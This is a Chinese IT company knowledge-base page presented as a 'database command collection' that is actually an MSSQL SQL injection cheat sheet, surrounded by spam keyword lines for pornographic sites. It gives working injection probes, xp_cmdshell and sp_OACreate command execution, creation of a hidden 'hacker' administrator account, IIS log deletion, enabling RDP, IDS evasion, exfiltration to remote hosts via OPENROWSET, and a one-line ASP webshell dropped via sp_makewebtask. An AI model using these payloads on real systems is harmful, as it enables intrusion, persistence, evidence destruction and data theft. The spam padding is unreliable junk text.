久久精品国产91精品亚洲_欧美日韩性视频在线_欧美私人啪啪vps_亚洲精品乱码久久久久久按摩观_99热这里只有精品8_黑丝一区二区三区_国产美女精品免费电影_亚洲图片在线观看_久久不见久久见免费视频1_亚洲欧美在线免费观看_欧美一区二区私人影院日本_国产精品美女视频网站_一区二区三区精品国产_亚洲美女免费精品视频在线观看_国产午夜精品久久_久久国产精品久久久久久久久久

 
您現在的位置:首頁 ? 知識庫 ? 系統集成 ? 數據庫維護 數據庫維護
數據庫命令集
發布日期:2018-04-04

and exists (select * from sysobjects) //判斷是否是MSSQL

and exists(select * from tableName) //判斷某表是否存在..tableName為表名

and 1=(select @@VERSION) //MSSQL版本

And 1=(select db_name()) //當前數據庫名

and 1=(select @@servername) //本地服務名

and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判斷是否是系統管理員

and 1=(Select IS_MEMBER('db_owner')) //判斷是否是庫權限

and 1= (Select HAS_DBACCESS('master')) //判斷是否有庫讀取權限

and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴庫名DBID為1,2,3....

;declare @d int //是否支持多行

and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判斷XP_CMDSHELL是否存在

and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread擴展存儲過程是不是已經被刪除

添加和刪除一個SA權限的用戶test:(需要SA權限)

exec master.dbo.sp_addlogin test,password

exec master.dbo.sp_addsrvrolemember test,sysadmin

停掉或激活某個服務。 (需要SA權限)

exec master..xp_servicecontrol 'stop','schedule'

exec master..xp_servicecontrol 'start','schedule'

暴網站目錄

create table labeng(lala nvarchar(255), id int)

DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots','/',@result output insert into labeng(lala) values(@result);

and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from labeng where lala>1)

DOS下開3389 并修改端口號

sc config termservice start= auto

net start termservice

//允許外連

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f

//該3389端口到80

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber /t REG_DWORD /d 80 /f

SQL Server

判斷是否可注射:

http://www.targer.com/article.asp?id=6

http://www.targer.com/article.asp?id=6'

http://www.targer.com/article.asp?id=6 and 1=1

http://www.targer.com/article.asp?id=6 and 1=2

http://www.targer.com/article.asp?action=value' and 1=1

http://www.targer.com/article.asp?action=value' and 1=2

searchpoints%' and 1=1

searchpoints%' and 1=2

確定數據庫類型:

http://www.targer.com/article.asp?id=6 and user>0

http://www.targer.com/article.asp?id=6 and (select count(*) from sysobjects)>0

查詢當前用戶數據信息:

article.asp?id=6 having 1=1--

暴當前表中的列:

article.asp?id=6 group by admin.username having 1=1--

article.asp?id=6 group by admin.username,admin.password having 1=1--

暴任意表和列:

and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1

and (select top col_name(object_id('admin'),N) from sysobjects)>1

暴數據庫數據:

and (select top 1 password from admin where id=N)>1

修改數據庫中的數據:

;update admin set password='oooooo' where username='xxx'

增添數據庫中的數據:

;insert into admin values (xxx,oooooo)--

刪數據庫:

;drop database webdata

獲取當前數據庫用戶名:and user>0

獲取當前數據庫名:and db_name()>0

獲取數據庫版本:and (select @@version)>0

判斷是否支持多句查詢:;declare @a int--

判斷是否支持子查詢:and (select count(1) from [sysobjects])>=0

數據庫的擴展存儲過程:exec master..xp_cmdshell

查看服務器C盤目錄:;exec_master..xp_cmdshell 'dir c:'

判斷擴展存儲過程是否存在:and select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

恢復擴展存儲過程:;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'

刪除擴展存儲過程:;exec sp_dropextendedproc 'xp_cmdshell'

在MSSQL2000中提供了一些函數用于訪問OLE對象間接獲取權限:

;declare @s int

;exec sp_oacreat 'wscript.shell',@s

;exec master..spoamethod @s,'run',null,'cmd.exe/c dir c:'

判斷當前數據庫用戶名是否擁有比較高的權限:

and 1=(select is_srvrolemember('sysadmin'))

and 1=(select is_srvrolemember('serveradmin'))

and 1=(select is_srvrolemember('setupadmin'))

and 1=(select is_srvrolemember('securityadmin'))

and 1=(select is_srvrolemember('diskadmin'))

and 1=(select is_srvrolemember('bulkadmin'))

判斷當前數據庫用戶名是否為DB_OWNER:

and 1=(select is_member('db_owner'))

在SQLSERVER的master.dbo.sysdatabases表中存放著SQLSERVER數據庫系統中的所有數據庫信息,只需要PUBLIC權限就可以對此表進行SELECT操作:

and (select top 1 name from master.dbo.sysdatabase order by dbid)>0

and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0

刪除日志記錄:

;exec master.dbo.xp_cmdshell 'del c:winntsystem32logfilesw3svc5ex070606.log >c: emp.txt'

替換日志記錄:

;exec master.dbo.xp_cmdshell 'copy c:winntsystem32logfilesw3svc5ex070404.log c:winntsystem32logfilesw3svc5ex070606.log >c: emp.txt'

獲取WEB路徑:

;declare @shell int

;exec master..sp_oamethod 'wscript.shell',@shell out

;exec master..sp_oamethod @shell,'run',null,'cmd.exe/c dir /s d:/index.asp >c:/log.txt

利用XP_CMDSHELL搜索:

;exec master..xp_cmdshell 'dir /s d:/index.asp'

顯示服務器網站配置信息命令:

cmd /c cscript.exe c:inetpubadminscriptadsutil.vbs enum w3svc/1/root

cmd /c cscript.exe c:inetpubadminscriptadsutil.vbs enum w3svc/2/root

利用XP_REGREAD可用PUBLIC權限讀?。?/p>

;exec master.dbo.xp_regread

hkey_local_machine,

'systemcurrentcontrolsetservicesw3svcparameters irtual roots'

'/'

SQLSERVER下的高級技術可以參考閱讀曾云好所著的精通腳本黑客第五章。

3、DSqlHelper

檢測權限SYSADMIN:

and 1=(select IS_SRVROLEMEMBER('sysadmin'))

serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin、db_owner。

檢測XP_CMDSHELL(CMD命令):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_cmdshell')

檢測XP_REGREAD(注冊表讀取功能):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread')

檢測SP_MAKEWEBTASK(備份功能):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask')

檢測SP_ADDEXTENDEDPROC:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc')

檢測XP_SUBDIRS讀子目錄:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs')

檢測XP_DIRTREE讀子目錄:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree')

修改內容:

; UPDATE 表名 set 字段=內容 where 1=1

XP_CMDSHELL檢測:

;exec master..xp_cmdshell 'dir c:'

修復XP_CMDSHELL:

;exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'

用XP_CMDSHELL添加用戶hacker:

;exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'

XP_CMDSHELL把用戶hacker加到ADMIN組:

;exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'

創建表test:

;create table [dbo].[test] ([dstr][char](255));

檢測表段test:

and exists (select * from test)

讀取WEB的位置(讀注冊表):

;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots', '/',@result output insert into test (dstr) values(@result);--

爆出WEB的絕對路徑(顯錯模式):

and 1=(select count(*) from test where dstr > 1)

刪除表test:

;drop table test;--

創建查看目錄的表dirs:

;create table dirs(paths varchar(100), id int)

把查看目錄的內容加入表dirs:

;insert dirs exec master.dbo.xp_dirtree 'c:'

爆目錄的內容dirs:

and 0<>(select top 1 paths from dirs)

備份數據庫DATANAME:

declare @a sysname; set @a=db_name();backup DATANAME @a to disk='c:inetpubwwwrootdown.bak';--

刪除表dirs:

;drop table dirs;--

創建表temp:

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

把驅動盤列表加入temp表:

;insert temp exec master.dbo.xp_availablemedia;--

刪除表temp:

;delete from temp;--

創建表dirs:

;create table dirs(paths varchar(100), id int);--

獲得子目錄列表XP_SUBDIRS:

;insert dirs exec master.dbo.xp_subdirs 'c:';--

爆出內容(顯錯模式):

and 0<>(select top 1 paths from dirs)

刪除表dirs:

;delete from dirs;--

創建表dirs:

;create table dirs(paths varchar(100), id int)--

用XP_CMDSHELL查看目錄內容:

;insert dirs exec master..xp_cmdshell 'dir c:'

刪除表dirs:

;delete from dirs;--

檢測SP_OAcreate(執行命令):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'SP_OAcreate')

SP_OAcreate執行CMD命令:

;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:windowssystem32cmd.exe /c net user hacker 123456 /add'

SP_OAcreate建目錄:

;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:windowssystem32cmd.exe /c md E:XkCmsVwebFormI1'

創建一個虛擬目錄E盤:

;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:inetpubwwwrootmkwebdir.vbs -w "默認 Web 站點" -v "e","e:"'

設置虛擬目錄E為可讀:

;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e +browse'

啟動SERVER服務:

;exec master..xp_servicecontrol 'start', 'server'

繞過IDS檢測XP_CMDSHELL:

;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:'

開啟遠程數據庫1:

; select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1' )

開啟遠程數據庫2:

;select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table'

//看看是什么權限的

and 1=(Select IS_MEMBER('db_owner'))

And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//檢測是否有讀取某數據庫的權限

and 1= (Select HAS_DBACCESS('master'))

And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

數字類型

and char(124)%2Buser%2Bchar(124)=0

字符類型

' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索類型

' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用戶名

and user>0

' and user>0 and ''='

檢測是否為SA權限

and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

檢測是不是MSSQL數據庫

and exists (select * from sysobjects);--

檢測是否支持多行

;declare @d int;--

恢復 xp_cmdshell

;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------

// 執行命令

//-----------------------

首先開啟沙盤模式:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet.0Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb執行系統命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:winntsystem32iasias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

執行命令

;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:WINNTsystem32cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:I1'

判斷xp_cmdshell擴展存儲過程是否存在:

http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

寫注冊表

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet.0Engines','SandBoxMode','REG_DWORD',1

REG_SZ

讀注冊表

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon','Userinit'

讀取目錄內容

exec master..xp_dirtree 'c:winntsystem32',1,1

數據庫備份

backup database pubs to disk = 'c:S.bak'

//爆出長度

And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

更改sa口令方法:用sql綜合利用工具連接后,執行命令:

exec sp_password NULL,'新密碼','sa'

添加和刪除一個SA權限的用戶test:

exec master.dbo.sp_addlogin test,ptlove

exec master.dbo.sp_addsrvrolemember test,sysadmin

刪除擴展存儲過過程xp_cmdshell的語句:

exec sp_dropextendedproc 'xp_cmdshell'

添加擴展存儲過過程

EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:winntsystem32sqllog.dll'

GRANT exec On xp_proxiedadata TO public

停掉或激活某個服務。

exec master..xp_servicecontrol 'stop','schedule'

exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某個目錄下的子目錄。

xp_getfiledetails 'C:InetpubwwwrootSQLInjectlogin.asp'

dbo.xp_makecab

將目標多個檔案壓縮到某個目標檔案之內。

所有要壓縮的檔案都可以接在參數列的最后方,以逗號隔開。

dbo.xp_makecab

'c: est.cab','mszip',1,

'C:InetpubwwwrootSQLInjectlogin.asp',

'C:InetpubwwwrootSQLInjectsecurelogin.asp'

xp_terminate_process

停掉某個執行中的程序,但賦予的參數是 Process ID。

利用”工作管理員”,透過選單「檢視」-「選擇字段」勾選 pid,就可以看到每個執行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解開壓縮檔。

xp_unpackcab 'c: est.cab','c: emp',1

某機,安裝了radmin,密碼被修改了,regedit.exe不知道被刪除了還是被改名了,net.exe不存在,沒有辦法使用regedit /e 導入注冊文件,但是mssql是sa權限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdmin 2.0ServerParameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密碼為12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdmin 2.0ServerParameters','port','REG_BINARY',0xd20400 則端口值改為1234

create database lcx;

Create TABLE ku(name nvarchar(256) null);

Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到數據庫名

insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

//在Master中創建表,看看權限怎樣

Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目錄里寫入一句話馬:

http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:www t88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

//更新表內容

Update films SET kind = 'Dramatic' Where id = 123

//刪除內容

delete from table_name where Stockid = 3

  • 1.公司登記注冊于2003年1月27日,清遠市桑達電子網絡媒體有限公司
    2.公司2006年起成為清遠市政府定點協議供貨商,電子采購供貨商
    3.公司2007年被清遠市相關政府部門評為安防行業狀元
    4.公司2007年起成為長城電腦清遠如意服務站(SP368)
    5.公司2007年承建清遠市橫河路口電子警察工程,開創清遠電子警察先河。
  • 6.公司2007年起成為IBM合作伙伴、公司2010年底成為金蝶軟件清遠金牌代理(伙伴編號:30030013)
    7.公司組團隊參加南方都市報組織的創富評選,獲廣東80強。公司申請多項軟件著作權、專利權
    8.2016年起公司成為粵東西北地區為數不多的雙軟企業,確立“讓軟件驅動世界,讓智能改變生活!"企業理想
    9.2016-01-29更名為廣東互動電子網絡媒體有限公司
    10.2021-01-13更名為廣東互動電子有限公司
  • 投資合作咨詢熱線電話:0763-3391888 3323588
  • 做一個負責任的百年企業! 天行健,君子以自強不息;地勢坤,君子以厚德載物;
    為用戶創造價值! 讓軟件驅動世界; 讓智能改變生活; 超越顧客期望,幫助顧客成功;
    對客戶負責,對員工負責,對企業命運負責!幫助支持公司的客戶成功;幫助忠誠于公司的員工成功!
  • 聯系電話:0763-3391888 3323588 3318977
    服務熱線:18023314222 QQ:529623964
  • 工作QQ:2501204690 商務QQ: 602045550
    投資及業務投訴QQ: 529623964
    微信:小米哥 微信號:qysed3391888
    騰訊微博:桑達網絡-基石與起點
  • E-MAIL:222#QYSED.CN ok3391888#163.com (請用@替換#)
在線客服
  • 系統集成咨詢
    點擊這里給我發消息
  • 網站\微信\軟件咨詢
    點擊這里給我發消息
  • 售后服務
    點擊這里給我發消息
  • 投資合作
    點擊這里給我發消息
久久精品国产91精品亚洲_欧美日韩性视频在线_欧美私人啪啪vps_亚洲精品乱码久久久久久按摩观_99热这里只有精品8_黑丝一区二区三区_国产美女精品免费电影_亚洲图片在线观看_久久不见久久见免费视频1_亚洲欧美在线免费观看_欧美一区二区私人影院日本_国产精品美女视频网站_一区二区三区精品国产_亚洲美女免费精品视频在线观看_国产午夜精品久久_久久国产精品久久久久久久久久
99精品国产一区二区青青牛奶| 亚洲国产精品ⅴa在线观看| 欧美一激情一区二区三区| 欧美电影免费观看高清完整版| 欧美二区在线观看| 日韩亚洲欧美高清| 国内外成人免费激情在线视频| 最新中文字幕亚洲| 亚洲新中文字幕| 激情综合色综合久久| 欧美精品播放| 欧美极品在线视频| 欧美日韩中国免费专区在线看| 亚洲综合电影| 欧美精品亚洲精品| 欧美伊人久久久久久午夜久久久久| 久久亚洲春色中文字幕久久久| 国产目拍亚洲精品99久久精品| 久久国产日韩欧美| 亚洲黄页视频免费观看| 国产日韩av一区二区| 久久精品国产第一区二区三区最新章节| 亚洲精品欧美精品| 久久精品在线视频| 久久久久久久久伊人| 激情自拍一区| 欧美成人精品1314www| 精品51国产黑色丝袜高跟鞋| 亚洲国产一区二区a毛片| 亚洲调教视频在线观看| 亚洲大胆美女视频| 欧美日韩1区2区| 亚洲免费在线精品一区| 久久综合99re88久久爱| 亚洲视频精品在线| 永久91嫩草亚洲精品人人| 在线成人av| 亚洲黄色片网站| 99国产精品久久久久久久| 国产一区二区高清视频| 国产亚洲一区二区三区在线观看| 黄色工厂这里只有精品| 亚洲精品久久久久中文字幕欢迎你| 亚洲免费一级电影| 亚洲午夜成aⅴ人片| 亚洲自拍三区| 亚洲国产精品欧美一二99| 欧美激情bt| 国产欧美日韩一级| 久久精品视频va| 亚洲激情社区| 欧美日本国产精品| 欧美午夜理伦三级在线观看| 久久久久久成人| 你懂的国产精品永久在线| 黑丝一区二区三区| 久久成人久久爱| 欧美理论在线| 美女主播一区| 亚洲在线第一页| 久久精品国产99精品国产亚洲性色| 国内在线观看一区二区三区| 国产精品高潮呻吟久久av黑人| 国产麻豆精品久久一二三| 欧美一区二区精品| 欧美激情精品久久久久久大尺度| 香蕉久久夜色| 欧美黑人多人双交| 有坂深雪在线一区| 欧美高清自拍一区| 欧美国产欧美亚洲国产日韩mv天天看完整| 久久一区二区视频| 欧美在线影院| 午夜精品99久久免费| 亚洲素人在线| 欧美一级理论片| 国产伊人精品| 欧美一级久久| 欧美精品一区二区三区久久久竹菊| 精品成人a区在线观看| 亚洲国产成人av好男人在线观看| 一区久久精品| 欧美视频在线一区二区三区| 在线亚洲欧美专区二区| 国产欧美日韩精品一区| 蜜桃av噜噜一区| 一区二区三区四区国产| 久久久久久久久岛国免费| 国产偷国产偷亚洲高清97cao| 国产精品www.| 国产乱码精品一区二区三区av| 久久久av水蜜桃| 国产一区二区三区视频在线观看| 精品va天堂亚洲国产| 亚洲福利专区| 艳妇臀荡乳欲伦亚洲一区| 久久综合九色欧美综合狠狠| 欧美日韩精品久久| 免费在线观看日韩欧美| 亚洲日本欧美天堂| 久久全球大尺度高清视频| 欧美成人三级在线| 牛牛影视久久网| 亚洲开发第一视频在线播放| 国产综合视频在线观看| 午夜精品久久久久久| 久久精品亚洲一区二区三区浴池| 亚洲电影观看| 在线不卡免费欧美| 国产精品在线看| 一本久久a久久免费精品不卡| 亚洲精品国产精品国自产观看浪潮| 亚洲国产第一| 亚洲精品久久| 一区二区三区国产| 媚黑女一区二区| 亚洲欧洲精品一区二区三区波多野1战4| 小黄鸭精品aⅴ导航网站入口| 亚洲第一天堂av| 亚洲国产专区校园欧美| 欧美日韩免费在线视频| 国产精品盗摄久久久| 欧美激情一级片一区二区| 欧美午夜精品久久久久久孕妇| 99re66热这里只有精品4| 欧美日韩色婷婷| 久久精品国产91精品亚洲| 久久黄色小说| 亚洲影院在线| 亚洲一区二区三区视频| 久久国产66| 噜噜噜久久亚洲精品国产品小说| 国产精品99久久久久久白浆小说| 欧美久久久久久| 亚洲精品中文字幕女同| 性欧美1819性猛交| 亚洲最新中文字幕| 国产一区二区三区四区| 欧美与欧洲交xxxx免费观看| 欧美aⅴ一区二区三区视频| 国产精品热久久久久夜色精品三区| 日韩视频一区| 狠狠干综合网| 亚洲国产精品久久久久秋霞影院| 欧美有码在线观看视频| 国产欧美一区二区精品婷婷| 国产精品永久免费在线| 欧美日韩在线观看一区二区三区| 亚洲精品视频在线观看网站| 91久久在线播放| 麻豆精品视频在线观看| 亚洲人永久免费| 亚洲人成网站777色婷婷| 亚洲卡通欧美制服中文| 欧美日韩精品免费在线观看视频| 欧美婷婷六月丁香综合色| 久久久五月婷婷| 亚洲国产成人高清精品| 欧美一区二视频在线免费观看| 亚洲国产欧美一区二区三区丁香婷| 国产模特精品视频久久久久| 亚洲国产精品久久| 老巨人导航500精品| 亚洲国产成人午夜在线一区|